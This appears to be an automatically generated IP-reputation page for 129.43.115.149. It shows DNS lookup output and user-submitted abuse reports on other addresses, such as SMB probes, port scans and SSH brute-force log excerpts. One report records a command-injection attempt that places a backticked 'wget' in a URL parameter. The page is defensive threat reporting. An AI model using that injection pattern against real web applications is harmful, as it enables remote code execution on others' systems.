Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States of America (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 129.43.115.149
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 6726
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;129.43.115.149.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020901 1800 900 604800 86400

;; Query time: 37 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 10 05:16:38 CST 2025
;; MSG SIZE  rcvd: 107
Host info
Host 149.115.43.129.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 149.115.43.129.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
42.120.74.36 attackspam
Unauthorized connection attempt detected from IP address 42.120.74.36 to port 445 [T]
2020-01-10 04:25:50
51.158.21.110 attackbots
SIPvicious
2020-01-10 04:22:12
186.67.129.34 attackspambots
SSH Brute Force
2020-01-10 04:39:29
91.215.206.2 attack
Unauthorized connection attempt from IP address 91.215.206.2 on Port 445(SMB)
2020-01-10 04:43:31
113.137.36.187 attackbots
Jan  9 18:06:24 nextcloud sshd\[28691\]: Invalid user feq from 113.137.36.187
Jan  9 18:06:24 nextcloud sshd\[28691\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.137.36.187
Jan  9 18:06:27 nextcloud sshd\[28691\]: Failed password for invalid user feq from 113.137.36.187 port 51852 ssh2
...
2020-01-10 04:34:03
209.91.214.178 attackbotsspam
Telnet/23 MH Probe, BF, Hack -
2020-01-10 04:24:50
160.179.249.34 attackspam
Automatic report - Port Scan Attack
2020-01-10 04:45:27
27.246.235.233 attack
Unauthorized connection attempt from IP address 27.246.235.233 on Port 445(SMB)
2020-01-10 04:19:11
212.75.214.90 attackspambots
1578574901 - 01/09/2020 14:01:41 Host: 212.75.214.90/212.75.214.90 Port: 445 TCP Blocked
2020-01-10 04:35:16
122.165.207.221 attackspambots
Jan  9 20:16:33 server sshd\[26005\]: Invalid user odroid from 122.165.207.221
Jan  9 20:16:33 server sshd\[26005\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.165.207.221 
Jan  9 20:16:34 server sshd\[26005\]: Failed password for invalid user odroid from 122.165.207.221 port 41747 ssh2
Jan  9 20:20:17 server sshd\[27014\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.165.207.221  user=root
Jan  9 20:20:19 server sshd\[27014\]: Failed password for root from 122.165.207.221 port 57784 ssh2
...
2020-01-10 04:18:02
177.1.214.207 attackspambots
SSH authentication failure x 6 reported by Fail2Ban
...
2020-01-10 04:47:19
217.208.141.71 attackbots
Unauthorized connection attempt detected from IP address 217.208.141.71 to port 23
2020-01-10 04:28:29
46.61.183.111 attackspam
Unauthorized connection attempt from IP address 46.61.183.111 on Port 445(SMB)
2020-01-10 04:31:09
124.158.108.189 attackbots
/card_scan_decoder.php?No=30&door=`wget
2020-01-10 04:14:35
197.3.199.253 attackspam
Telnet/23 MH Probe, BF, Hack -
2020-01-10 04:13:29

Recently Reported IPs

173.254.214.45 152.141.237.164 101.85.217.247 199.248.12.122
248.94.199.134 56.66.84.239 133.47.71.221 71.151.163.161
199.178.202.193 123.110.194.126 104.38.128.182 147.231.251.194
128.189.204.188 174.212.87.205 29.198.16.164 142.23.89.199
27.81.141.205 35.57.117.66 190.157.239.134 85.243.245.178